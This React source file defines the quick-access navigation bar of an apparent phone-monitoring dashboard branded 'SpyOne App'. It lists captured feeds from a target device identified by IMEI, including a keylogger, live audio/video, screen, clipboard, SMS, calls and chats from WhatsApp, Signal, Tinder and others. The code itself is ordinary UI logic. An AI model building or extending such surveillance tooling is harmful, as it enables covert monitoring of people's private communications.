import {
  Box,
  Button,
  Center,
  Grid,
  Image,
  Text,
  Tooltip,
  useMediaQuery,
} from "@chakra-ui/react";
import {
  getQuickAccessBarApi,
  getQuickAccessBarUnreadCountApi,
  readCountApi,
} from "api/deviceData";
import { useAppSelector } from "hooks/store/hooks";
import React, { useEffect, useRef, useState } from "react";
import { Link, useLocation, useNavigate } from "react-router-dom";
import { selectColorThemeMode } from "stores/ui/uiSlice";


import {
  markAuthStore,
  selectCurrentDevice,
  selectDeviceFamily,
} from "stores/auth/authSlice";
import {
  getCurrentDeviceDetails,
  getTempCurrentDeviceDetails,
  getUserDetails,
  setQuickAccessView,
  setTempCurrentDeviceDetails,
} from "utils/local-storage";
import apiHelper from "services/apiHelper";
import { useDispatch } from "react-redux";
import DynamicTitleComponent from "components/DynamicTitleComponent";

import { ASSETS, URLS } from "configs/brandConfig";
import { useTranslation } from "TranslationContext";
import { selectWebSocketMessages } from "stores/webSocket/websocketSlice";


const dummyQuickAccessBarData = [
  {
    id: "audiovideo",
    name: "Audio/Video Live",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "calls",
    name: "Calls",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "sms",
    name: "SMS",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "keylogger",
    name: "Keylogger",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "whatsapp",
    name: "Whatsapp",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "facebook",
    name: "Facebook",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "instagram",
    name: "Instagram",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "tiktok",
    name: "Tiktok",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "viber",
    name: "Viber",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "signal",
    name: "Signal",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "telegram",
    name: "Telegram",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "youtube",
    name: "Youtube",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "snapchat",
    name: "Snapchat",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    "id": "mteams",
    "name": "MTeams",
    "icon": "",
    "viewtype": 0,
    "viewtype_comment": "0:chatview , 1:tableview",
    "order": 1
  },
  {
    id: "discord",
    name: "Discord",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "googlemeet",
    name: "Google Meet",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    "id": "threema",
    "name": "Threema",
    "icon": "",
    "viewtype": 0,
    "viewtype_comment": "0:chatview , 1:tableview",
    "order": 1
  },
  {
    "id": "twitch",
    "name": "Twitch",
    "icon": "",
    "viewtype": 0,
    "viewtype_comment": "0:chatview , 1:tableview",
    "order": 1
  },
  {
    id: "tinder",
    name: "Tinder",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    "id": "badoo",
    "name": "Badoo",
    "icon": "",
    "viewtype": 0,
    "viewtype_comment": "0:chatview , 1:tableview",
    "order": 1
  },
  {
    "id": "gg",
    "name": "GG",
    "icon": "",
    "viewtype": 0,
    "viewtype_comment": "0:chatview , 1:tableview",
    "order": 1
  },
  {
    id: "botim",
    name: "BOTIM",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "line",
    name: "Line",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "kakao",
    name: "Kakao Talk",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "bip",
    name: "Bip Messenger",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "zolo",
    name: "Zalo",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "imo",
    name: "Imo",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "justtalk",
    name: "Justtalk",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "screen",
    name: "Screen",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "webHistory",
    name: "WebHistory",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "photo",
    name: "Photos",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "mail",
    name: "Mail",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "clipboard",
    name: "Clipboard",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "search",
    name: "Search",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  // {
  //   id: "notification",
  //   name: "Notification",
  //   icon: "",
  //   viewtype: 0,
  //   viewtype_comment: "0:chatview , 1:tableview",
  //   order: 1,
  // },
  {
    id: "dataLiberation",
    name: "Data Management",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
  {
    id: "help",
    name: "Help",
    icon: "",
    viewtype: 0,
    viewtype_comment: "0:chatview , 1:tableview",
    order: 1,
  },
];

const QuickAccessBar = () => {
  // Redux selectors
  const colorThemeMode = useAppSelector(selectColorThemeMode);
  const currentDevice = useAppSelector(selectCurrentDevice);
  const deviceFamily = useAppSelector(selectDeviceFamily);
  const websocketdata  = useAppSelector(selectWebSocketMessages);
 // const webdata = useAppSelector(selectWebSocketMessages);
  const processedKeysRef = useRef(new Set());
  
  useEffect(() => {
    if (!Array.isArray(websocketdata) || websocketdata.length === 0) return;
  
    const updatedUnread = { ...quickAccessUnreadCountData };
    const updatedDisplay = { ...displayCount };
    const validAppIds = (quickAccessBarData || [])
      .filter((app) => ASSETS.ICONS.quickAccess[app.id])
      .map((app) => app.id);
  
    let hasNew = false;
  
    websocketdata.forEach((item) => {
      const popup = item?.messages?.popup;
      const data = item?.messages?.data;
  
      const uniqueKey = `${popup?.marketid}_${popup?.number}_${popup?.time}`;
      if (!data || processedKeysRef.current.has(uniqueKey)) return;
  
      processedKeysRef.current.add(uniqueKey); 
      hasNew = true;
  
      Object.entries(data).forEach(([appId, count]) => {
        if (validAppIds.includes(appId)) {
          updatedUnread[appId] = (updatedUnread[appId] || 0) + count;
          updatedDisplay[appId] = true;
        }
      });
    });
  
    if (hasNew) {
      setQuickAccessUnreadCountData(updatedUnread);
      setDisplayCount(updatedDisplay);
      setTotalUnreadCount(
        Object.entries(updatedUnread)
          .filter(([appId]) => appId !== "notification")
          .reduce((a, [, b]) => a + b, 0)
      );
    }
  }, [websocketdata]);
  
  // Hooks for media queries and routing
  const [isDesktop] = useMediaQuery("(min-width: 768px)");
  const { pathname } = useLocation();
  const dispatch = useDispatch();
  const navigate = useNavigate();
  const {translate} = useTranslation()

  // State variables
  const [displayCount, setDisplayCount] = useState({});
  const [loading, setLoading] = useState(true);
  const [quickAccessBarData, setQuickAccessBarData] = useState();
  const [quickAccessUnreadCountData, setQuickAccessUnreadCountData] = useState();
  const [totalUnreadCount, setTotalUnreadCount] = useState(0);
  const [sticky, setSticky] = useState(false); // State to manage sticky header behavior

  // Fetch local device and user details
  const localCurrentDevice = getCurrentDeviceDetails();
  const localTempCurrentDevice = getTempCurrentDeviceDetails();
  const userDetails = getUserDetails();

  // Effect to check IMEI status and navigate accordingly
  useEffect(() => {
    if (!localCurrentDevice?.family || !localCurrentDevice?.imei) return;

    (async () => {
      await apiHelper(
        `api/imei/updateimei/${localCurrentDevice.imei}/${localCurrentDevice.imei}`,
        "get"
      )
        .then((res) => {
          const type = res.data.data.license.type;

          // Handle different license and status conditions
          if (res.data.status === 203) {
            dispatch(markAuthStore({ appDisable: false }));
            navigate("/registerNewDevice");
          } else if (res.data.status === 402 || !type || ["3", "4"].includes(type)) {
            dispatch(markAuthStore({ appDisable: true }));
            navigate("/subscription");
          } else {
            dispatch(markAuthStore({ appDisable: false }));
            if (pathname !== "/paymentSuccess") {
              // navigate("/dashboard");
            }
          }
        })
        .catch((err) => {
          dispatch(markAuthStore({ appDisable: true }));
          if (err?.response?.data?.status === 402) {
            navigate("/subscription");
          }
        });
    })();

    // Fetch quick access data if not already loaded
    if (!quickAccessBarData) {
      getQuickAccessBarApi(localCurrentDevice.imei, localCurrentDevice.family, setQuickAccessBarData);
    }
    if (!quickAccessUnreadCountData) {
      getQuickAccessBarUnreadCountApi(localCurrentDevice.imei, setQuickAccessUnreadCountData);
    }
  }, []);

  // Effect to update temp device details and fetch quick access data when device changes
  useEffect(() => {
    if (!currentDevice?.family || !currentDevice?.imei) return;

    if (localTempCurrentDevice.imei !== currentDevice.imei) {
      setTempCurrentDeviceDetails(currentDevice);
      getQuickAccessBarApi(currentDevice.imei, currentDevice.family, setQuickAccessBarData);
      getQuickAccessBarUnreadCountApi(currentDevice.imei, setQuickAccessUnreadCountData);
    }
  }, [currentDevice]);

  // Effect to manage loading state based on quick access data availability
  useEffect(() => {
    if (!quickAccessBarData) return;

    setLoading(!(deviceFamily === 12 || quickAccessUnreadCountData));
  }, [quickAccessBarData, quickAccessUnreadCountData]);

  // Effect to handle sticky navigation behavior based on scroll position
  useEffect(() => {
    window.addEventListener("scroll", isSticky);
    return () => {
      window.removeEventListener("scroll", isSticky);
    };
  }, []);

  // Function to toggle sticky header based on scroll position
  const isSticky = () => {
    const scrollTop = window.scrollY;
    setSticky(scrollTop >= 100);
  };

  // Function to mark an item as read and update display count state
  const callQuickAccessBarComponent = (id) => {
    if (id !== "audiovideo") {
      readCountApi(currentDevice.imei, id);
    }
    setDisplayCount({ ...displayCount, [id]: false }); // }
    setQuickAccessUnreadCountData(prev => ({...prev,[id]:0,}));
  };

  // Effect to calculate unread count and update display state
  useEffect(() => {
    let displayCountData = {};
    if (quickAccessBarData && quickAccessUnreadCountData) {
      quickAccessBarData.forEach((item) => {
        displayCountData[item.id] = quickAccessUnreadCountData[item.id] > 0;
      });
    }
    setDisplayCount({ ...displayCountData });
    // Calculate total unread messages count
    const total = Object.entries(quickAccessUnreadCountData || {})
      .filter(([appId]) => appId !== "notification")
      .reduce((acc, [, value]) => acc + value, 0);
    setTotalUnreadCount(total);
  }, [quickAccessBarData, quickAccessUnreadCountData]);


  return (
    <>
      <DynamicTitleComponent
        title={`${totalUnreadCount === 0 ? "" : `(${totalUnreadCount})`
          } SpyOne App`}
      />{" "}
      {isDesktop ? (
        <Box
          className="accessQuickbar"
          p="0px 10px"
          color={`${colorThemeMode}_text`}
          bg={`${colorThemeMode}_background`}
          display={"flex"}
          flexWrap={"wrap"}
          justifyContent={"center"}
          h="51px"
          position={sticky ? "fixed" : "absolute"}
          top={sticky ? "0" : "auto"}
          overflow={"hidden"}
          w={"-webkit-fill-available"}
          _hover={{
            h: "fit-content",
            overflow: "hidden",
          }}
          zIndex={1001}
          borderBottom={"1px solid"}
          borderColor={`${colorThemeMode}_tertiary`}
        >
          {!loading ? (
            quickAccessBarData &&
            (deviceFamily === 12 || quickAccessUnreadCountData) &&
            quickAccessBarData
              .filter((app) => app.id !== "notification")
              .filter((app) => ASSETS.ICONS.quickAccess[app.id])
              .map((app) => {
              return (
                <Grid key={app.name}>
                  {app.id === "help" ? (
                    <Box
                      p="8px 5px"
                      as={Link}
                      to={URLS.ANDROID10_SETTINGS}
                      // key={app.name}
                    >
                      <Tooltip
                        hasArrow
                        label={translate[app.name]}
                        color={"#ffffff"}
                        bg={"#000000"}
                        placement="right"
                        borderRadius={"4px"}
                        p={"5px"}
                      >
                        <Box
                          display={"flex"}
                          alignItems={"center"}
                          position={"relative"}
                        >
                          <Image
                            borderRadius="full"
                            boxSize="35px"
                            // src={eval(app.id)}
                            src={ASSETS.ICONS.quickAccess[app.id]}
                            alt={translate[app.name]}
                            mr="5px"
                            bg={`${colorThemeMode}_background`}
                            _hover={{ cursor: "pointer" }}
                          />
                        </Box>
                      </Tooltip>
                    </Box>
                  ) : (
                    <Box
                      p="8px 5px"
                      as={Link}
                      to={`/quickAccessBar?view=${app.id}`}
                      key={app.name}
                      onClick={() => {
                        setQuickAccessView(app.id);
                        callQuickAccessBarComponent(app?.id);
                      }}
                    >
                      <Tooltip
                        hasArrow
                        label={translate[app.name]}
                        color={"#ffffff"}
                        bg={"#000000"}
                        placement="right"
                        borderRadius={"4px"}
                        p={"5px"}
                      >
                        <Box
                          display={"flex"}
                          alignItems={"center"}
                          position={"relative"}
                        >
                          <Image
                            borderRadius="full"
                            boxSize="35px"
                            // src={eval(app.id)}
                            src={ASSETS.ICONS.quickAccess[app.id]}
                            alt={translate[app.name]}
                            mr="5px"
                            bg={`${colorThemeMode}_background`}
                            _hover={{ cursor: "pointer" }}
                          />
                          {displayCount[app.id] &&
                            quickAccessUnreadCountData[app.id] > 0 && (
                              <Box
                                display={"flex"}
                                alignItems={"center"}
                                justifyContent={"center"}
                                bg={"#f62d51"}
                                minW={"20px"}
                                w={"fit-content"}
                                borderRadius={"50px"}
                                position={"absolute"}
                                top={"0px"}
                                left={"20px"}
                                p="3px 8px 2px"
                              >
                                <Text
                                  fontSize={"10px"}
                                  color={"#ffffff"}
                                  m="0px"
                                  lineHeight={"10px"}
                                >
                                  {/* 66 */}
                                  {quickAccessUnreadCountData[app.id]}
                                </Text>
                              </Box>
                            )}
                        </Box>
                      </Tooltip>
                    </Box>
                  )}
                </Grid>
              );
            })
          ) : (
            <>
              {dummyQuickAccessBarData
                .filter((app) => ASSETS.ICONS.quickAccess[app.id])
                .map((app) => {
                return (
                  <Box
                    p="8px 5px"
                    as={Link}
                    to={`/quickAccessBar?view=${app.id}`}
                    key={app.name}
                    onClick={() => {
                      userDetails?.email_status === "1" &&
                        setQuickAccessView(app.id);
                    }}
                  >
                    <Tooltip
                      hasArrow
                      label={translate[app.name]}
                      color={"#ffffff"}
                      bg={"#000000"}
                      placement="right"
                      borderRadius={"4px"}
                      p={"5px"}
                    >
                      <Box
                        display={"flex"}
                        alignItems={"center"}
                        position={"relative"}
                      >
                        <Image
                          borderRadius="full"
                          boxSize="35px"
                          // src={eval(app.id)}
                          src={ASSETS.ICONS.quickAccess[app.id]}
                          alt={translate[app.name]}
                          mr="5px"
                          bg={`${colorThemeMode}_background`}
                          _hover={{ cursor: "pointer" }}
                          onClick={() => {
                            userDetails?.email_status === "1" &&
                              quickAccessUnreadCountData?.[app?.id] &&
                              callQuickAccessBarComponent(app?.id);
                          }}
                        />
                      </Box>
                    </Tooltip>
                  </Box>
                );
              })}
            </>
          )}
        </Box>
      ) : (
        <Center>{/* <Spinner /> */}</Center>
      )}
    </>
  );
};

export default QuickAccessBar;
